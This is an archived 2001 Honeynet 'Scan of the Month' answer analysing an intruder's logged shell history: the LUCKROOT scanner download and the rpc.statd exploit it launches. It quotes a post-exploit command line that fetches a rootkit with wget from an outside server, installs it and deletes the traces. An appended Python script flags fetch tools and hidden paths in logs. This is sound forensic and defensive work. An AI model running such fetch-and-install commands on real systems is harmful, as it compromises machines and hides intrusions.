From abernau@trusecure.com Sat Mar 17 20:01:33 2001
Date: Mon, 05 Mar 2001 12:29:52 +0800
From: Adam Bernau
To: project@honeynet.org
Subject: March scan of the month

1. What is the blackhat trying to accomplish with his command line syntax?

The attacker is attempting to use a hidden directory (presumably created earlier, during the compromise) to download, unpack, and use his toolkit.

First, he attempts to cd into the .mail directory, and realises that he needs to cd into it by its absolute path:

  Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
  Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail

He downloads the toolkit from the author's server:

  Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
  Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y

He tries to uncompress it, but gets the options in the wrong order. He is either not familiar with GNU tar, or used to a system without GNU tar (where the leading - is neither needed nor suggested). The 'Lu' and 'L' lines look as though he is attempting to use filename completion.

  Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
  Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
  Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
  Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR

He cd's into the directory and starts the script, which compiles the scanner and starts scanning. Of the addresses, 12, 24, 63 and 64 are all cable-modem address ranges that I know of, so he is after machines with fast links. I am unsure why those ports were chosen (except for port 1, tcpmux). There is some duplication: 200.* port 120 and 216.* port 1.

  Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
  Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
  Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
  Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
  Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
  Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
  Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
  Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
  Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
  Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
  Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
  Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
  Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
  Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
  Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128
  Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
  Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20

2. What does the tool accomplish?

The tool scans class A network ranges by port, with optional class B/C specification. If the scanner gets a successful connection to a machine, it then throws the Linux rpc.statd exploit at it, in an attempt to root that machine too.

3. How does the tool work?

Usage is luckgo [[ ]]. Assuming only the class A specification, as used here, it opens MAX_SOCKETS sockets (as defined by the machine) and attempts a connection to each address in turn, incrementing each octet of the address from 0 through 255. When all of the sockets are in use, it loops waiting for one to free up, either by connecting successfully or by having the connection rejected. If the connection succeeds before it times out, it executes the Linux statd exploit (luckstatdx) against that IP address via the system() call.

4. Is this tool a worm, or would you classify it as something else?

This tool is not a worm. On successful exploit of the server, which starts a root shell on port 39168, the exploit connects to that port and issues the following commands:

  cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz;

I did not check, but assume that xzibit.tar.gz is a rootkit only. The scanner is a separate package to be downloaded, seems to have to be run manually, and is subject to typos :)

5. Is this tool original, or modified?

Don't know. I would guess that the statd exploit is a copy of another statd exploit, modified to automate the download/install of the rootkit.

Adam
-- 
Adam Bernau
TruSecure Asia Pacific
Email: abernau@trusecure.com
URL: http://www.trusecure.com
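As an added example (not part of Adam's message or of the Honeynet Project's material), the following Python parses syslog-forwarded bash HISTORY lines of the kind quoted above, tags the toolkit-staging commands a defender would want to alert on (fetch, archive extraction, dot-directory use), and counts the ./luckgo launches per target range so re-scanned ranges stand out. The tag names and the FETCH_TOOLS set are my own assumptions; the sample lines are copied from the history excerpt in the message.

```python
import re
from collections import Counter

# Syslog-forwarded bash HISTORY lines, in the format quoted in this message.
HISTORY_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<shell>\S+): HISTORY: PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$")
FETCH_TOOLS = {"wget", "lynx", "curl", "ftp"}  # assumed set of fetchers worth flagging

def parse_history(lines):
    """Parse well-formed HISTORY lines into dicts; anything else is dropped."""
    recs = [m.groupdict() for m in map(HISTORY_RE.match, (ln.strip() for ln in lines)) if m]
    for r in recs:
        r["pid"], r["uid"] = int(r["pid"]), int(r["uid"])
    return recs

def flag_indicators(records):
    """Tag commands that look like toolkit staging: fetch, archive extract, dot-directory."""
    flagged = []
    for r in records:
        argv = r["cmd"].split() or [""]
        tags = []
        if argv[0] in FETCH_TOOLS:
            tags.append("fetch")
        if argv[0] == "tar" and any(a.startswith("-") and "x" in a for a in argv[1:]):
            tags.append("extract")  # also catches mis-ordered attempts such as -xvfz
        # Any path component beginning with "." (other than "." and "..") is a dot-directory.
        if any(p.startswith(".") and p not in (".", "..")
               for a in argv[1:] for p in a.split("/")):
            tags.append("hidden-path")
        if tags:
            flagged.append((r["ts"], r["cmd"], tags))
    return flagged

def scan_targets(records):
    """Count each './luckgo <A> [<B>]' launch; a count above 1 is a re-scanned range."""
    argvs = (r["cmd"].split() for r in records)
    return Counter(" ".join(a[1:]) for a in argvs if len(a) >= 2 and a[0] == "./luckgo")

# Constructed sample input: lines copied from the history excerpt quoted in this message.
SAMPLE = """\
Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
""".splitlines()
```

The mistyped `.luckgo` line is deliberately left out of the launch count, since it never ran; on the full excerpt the only ranges counted twice are "200 120" and "216 1", matching the duplication noted above.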